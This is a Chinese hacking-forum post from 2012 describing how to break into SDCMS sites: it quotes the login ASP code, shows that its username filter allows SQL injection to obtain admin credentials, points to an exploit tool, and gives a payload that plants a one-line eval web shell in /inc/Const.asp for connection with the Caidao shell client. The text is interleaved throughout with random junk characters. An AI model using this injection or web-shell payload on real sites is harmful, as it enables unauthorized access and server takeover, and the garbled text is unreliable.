作者:T00LS 鬼哥
& Y5 j# X1 M1 ~+ U/ G漏洞文件:后台目录/index.asp" U8 @- [# n) O5 @$ }8 U$ `
7 X, N0 ?- u8 v1 JSub Check6 F5 J1 R4 r9 T6 \5 j( ^8 `
Dim username,password,code,getcode,Rs
3 A- |4 [9 M7 S+ v IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
6 B! i& R/ I. i9 e7 o username=FilterText(Trim(Request.Form("username")),1)
( _7 k! x% d% Y0 { password=FilterText(Trim(Request.Form("password")),1)
' K" y0 v0 \( d: e6 A code=Trim(Request.Form("yzm"))( S# |4 x" |# V8 H2 \- ~2 o6 X
getcode=Session("SDCMSCode")6 q- j6 n. I5 w; T" L% R% L" Q
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died$ N: U* q1 S1 J/ X
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
, P" W2 Z8 ?) D IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
3 y1 h# r/ V0 n; c IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( k0 |6 d! A8 N m9 f IF username="" or password="" Then
/ U# x* ?: f0 d' z0 Y Echo "用户名或密码不能为空"ied# U7 W3 l. z' `1 d( G
Else
4 T- `' { k" v, R, a1 ^6 C/ y Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")% c+ a: d# y- s/ c1 w7 k
IF Rs.Eof Then4 S: Q7 q, G; |
AddLog username,GetIp,"登录失败",1/ S# K, n' e% }+ l k) T
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会" l) M o5 {( e. @
Else
7 a, b: d8 m$ e5 t9 K Add_Cookies "sdcms_id",Rs(0)" X% V& n4 c. ~( e2 q
Add_Cookies "sdcms_name",username# b% {, t% m8 O/ a: B
Add_Cookies "sdcms_pwd",Rs(2)
. I. n% N: N. d0 i2 G+ |! ?# Y6 ` Add_Cookies "sdcms_admin",Rs(3), K6 z7 O$ D1 F
Add_Cookies "sdcms_alllever",Rs(4); o2 L' H8 ?# j. |! ?4 d+ L
Add_Cookies "sdcms_infolever",Rs(5)
- H3 `. q/ ]1 R) P Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
' c8 R4 p( W8 l; ], W AddLog username,GetIp,"登录成功",1; Z( c7 O1 e1 `1 w3 b3 B1 l
'自动删除30天前的Log记录
8 F4 D' o5 \! Y- a. | IF Sdcms_DataType Then
/ v0 y7 `! j' x1 i* B% ~ O5 T Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")' {4 `, K* `6 m8 k" s, \: P
Else
/ ?" Y/ g0 T& t( o' m7 U6 [; V Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")# F# x0 u! V9 E" d3 S& N/ ?) |
End IF
+ ?5 F& B& T% x9 @2 e! E9 x7 } Go("sdcms_index.asp")
7 w, ]; l+ W9 O5 B1 u; D; ]0 {. [ End IF+ {' a6 {5 c" l' m& W: Q
Rs.Close# E0 x: B4 n, {# v
Set Rs=Nothing6 D* p0 J! T8 o
End IF
# i; ~1 c* |2 N7 `& zEnd Sub
) }1 z0 l6 m1 x; F8 K" `" w; Q" ~7 F0 B* U9 j
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
6 W+ ^6 u& v$ C; O _4 E
8 I9 D" E4 I+ I0 |8 {, e. j1 p/ k% XFunction FilterText(ByVal t0,ByVal t1)
9 H% n0 r4 y2 B! M3 x* f0 q IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
* @. O% M7 j( N1 _: y) [ t0=Trim(t0)
% R7 o1 k/ X( D( F0 X+ q Select Case t1, x+ `5 @ R, q' w2 Y3 c7 r/ \
Case "1"
) Q/ \" d$ z# D5 @( `) f& F8 _ t0=Replace(t0,Chr(32),"")
# K$ m3 H* z3 |& k7 Y/ J8 C t0=Replace(t0,Chr(13),"")
* W' A, g7 V6 n1 K a4 W1 } t0=Replace(t0,Chr(10)&Chr(10),"")1 Y4 [- N& n4 g5 Y7 `, {
t0=Replace(t0,Chr(10),"")& g1 c& E0 z/ P' \9 V
Case "2"8 n4 _: B2 s; B; s' a, L% G
t0=Replace(t0,Chr(8),"")'回格9 s% W+ ]- j% m3 m
t0=Replace(t0,Chr(9),"")'tab(水平制表符)6 j3 V K' V. [% P" {( p. j( j
t0=Replace(t0,Chr(10),"")'换行
/ O; f; p* |( E! q8 d+ U6 r1 j t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
( o% f# V- w- E5 l4 _3 ? t0=Replace(t0,Chr(12),"")'换页
, f2 F2 `! [) ? N# g- O$ D% y t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合5 ]! z+ B' A9 Y2 R/ Q
t0=Replace(t0,Chr(22),"")
" w% `& `$ o1 P8 n; q3 r t0=Replace(t0,Chr(32),"")'空格 SPACE
2 V# S# i3 q/ G+ C t0=Replace(t0,Chr(33),"")'!
( y* e, A- Z0 [, E t0=Replace(t0,Chr(34),"")'"
' G" F) n" p9 y' K% T z t0=Replace(t0,Chr(35),"")'#
7 ?( G1 U2 c6 r4 n G/ h t0=Replace(t0,Chr(36),"")'$6 T$ C7 m" X: u6 s( _" @1 N5 t
t0=Replace(t0,Chr(37),"")'%" u7 D' e2 i: k/ D% a7 g
t0=Replace(t0,Chr(38),"")'&4 f* b1 a! S- h
t0=Replace(t0,Chr(39),"")''4 T e! S/ M. \6 A# G& B
t0=Replace(t0,Chr(40),"")'(
2 Y5 B# V; a$ f& r8 V t0=Replace(t0,Chr(41),"")')
# ~/ q9 {% H7 F; }. Z! r+ e t0=Replace(t0,Chr(42),"")'*1 c; T. n! p. n2 M7 L4 }. ^
t0=Replace(t0,Chr(43),"")'+/ P ~4 K* o7 a5 n& y; E. x* @, b
t0=Replace(t0,Chr(44),"")',+ I. s) K9 ]3 W' s' f! q0 n
t0=Replace(t0,Chr(45),"")'-& z( Z& v0 R$ r2 j0 [
t0=Replace(t0,Chr(46),"")'.
; g3 Q; \! ]% D% y! d* @6 e t0=Replace(t0,Chr(47),"")'/' \% K0 y& p& z3 @- X4 I
t0=Replace(t0,Chr(58),"")':
- v# ?/ m. i7 N( o2 k t0=Replace(t0,Chr(59),"")';
8 G2 w3 ^0 I8 v t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>) C2 M; J2 I3 X$ E7 N
t0=Replace(t0,Chr(63),"")'?) B* {* A- P9 x8 D9 X) y' x4 }
t0=Replace(t0,Chr(64),"")'@* ^( a( ]3 m- {( [- n! L3 j
t0=Replace(t0,Chr(91),"")'\
/ ?6 ], v( j+ `5 q+ k# t7 T t0=Replace(t0,Chr(92),"")'\ ]0 ~; C) j0 ? {5 F V
t0=Replace(t0,Chr(93),"")']9 S5 r2 u; l* C' P( R$ C( \
t0=Replace(t0,Chr(94),"")'^; g% v* H# ]# u9 `3 z4 i) y& _- f
t0=Replace(t0,Chr(95),"")'_
7 o& u7 A0 e" P! M3 o t0=Replace(t0,Chr(96),"")'`
( N" n. H6 z/ L e& I. k t0=Replace(t0,Chr(123),"")'{" R& L- f5 G( f) p4 H5 u
t0=Replace(t0,Chr(124),"")'|
/ f8 K! R3 k& s4 u- ~3 j9 h6 u# X t0=Replace(t0,Chr(125),"")'}
3 @) N+ r( v" v7 Z p% z4 m# L t0=Replace(t0,Chr(126),"")'~
# Q0 a. f5 o) g- c/ [$ ^9 X Case Else+ n0 E' x; a! c7 k" s
t0=Replace(t0, "&", "&")
7 G- R+ ^- Q4 v+ _ t0=Replace(t0, "'", "'")) M3 l) k" k- V; B- g& |
t0=Replace(t0, """", """); M: E) W0 @! J. f1 _" D* z) r8 p
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
u3 v1 S6 J( C6 S+ B End Select
7 N `- U( w( A# G; z; ^ IF Instr(Lcase(t0),"expression")>0 Then
' y9 W1 ^0 E. N( I- T! a/ d t0=Replace(t0,"expression","e­xpression", 1, -1, 0)* J: @" h% F) ^/ Y2 J5 F3 `
End If" E3 E" R0 \; \) y, g: z5 q
FilterText=t0) C: y3 k0 U) N
End Function
/ i* o- O; V2 y1 }8 \" l
) l, `9 @* r1 j# L1 O看到没。直接参数是1 只过滤/ ] G3 k+ X7 ]( P, z2 j( c' m! l
t0=Replace(t0,Chr(32)," ")
2 ~$ F, R7 T- d( {1 a t0=Replace(t0,Chr(13),"")
0 i* [1 H' p& W& H; Q# X- {+ F! Y t0=Replace(t0,Chr(10)&Chr(10),"
6 B- w: @. J. A")
( q1 X% M* ?3 s& n Z' } t0=Replace(t0,Chr(10),"/ R( e% V2 H, d9 b. G; t9 p
")8 X* k2 X% b3 {! ?2 g% }5 @7 _
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
9 ^+ J% d9 ^, O cEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP$ C" F2 p3 d6 w! N/ g1 M
2 i1 Q% O% J- A测试:9 h/ F' a" N E2 V: f X& A, _
8 L% P; Z8 ~6 D+ h) n& |* d K/ W
& f y0 L: [1 a1 X: H: @
现在输入工具上验证码,然后点OK6 \4 n( K2 }# m1 @8 ^
4 K1 B% q: P* L9 e( ]
: H1 C I. R. @0 g9 p看到我们直接进入后台管理界面了,呵呵!
/ u8 v0 m$ ` d
% e8 E. m3 k3 G5 D1 h; L
% ]0 G v) A% i% Y+ \9 R
2 O: l6 ^9 ?) J9 U4 G这样直接进入后台了。。。。
/ Z& s7 [9 U/ Y. C0 i+ O2 Q& _+ P* x
$ e) D5 |- k) C4 P/ [* h8 t$ m: g0 C0 X
SDCMS提权:
6 P5 T5 p2 p9 B8 s: l
! b9 v0 f+ K- ?4 o& h6 E3 D方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
W# R8 E/ m, g9 U1 Q0 J* j5 M/ [9 a( h
0 A& ~3 R5 S& d, r6 M- Z" i0 L) c7 i8 C j% y
OK,现在用菜刀连接下!
" |. n0 y' `' n b1 `
6 @$ }' I/ h& {9 {7 C
$ D$ e2 o/ H! r. r! D/ Y9 z
! T5 b8 A8 {! c7 { 7 ~2 `+ B+ E* M% ?# i6 o5 b
$ a# c$ V! p8 j# O: o6 { |
发表于 2012-11-9 20:57:02
收藏
支持
反对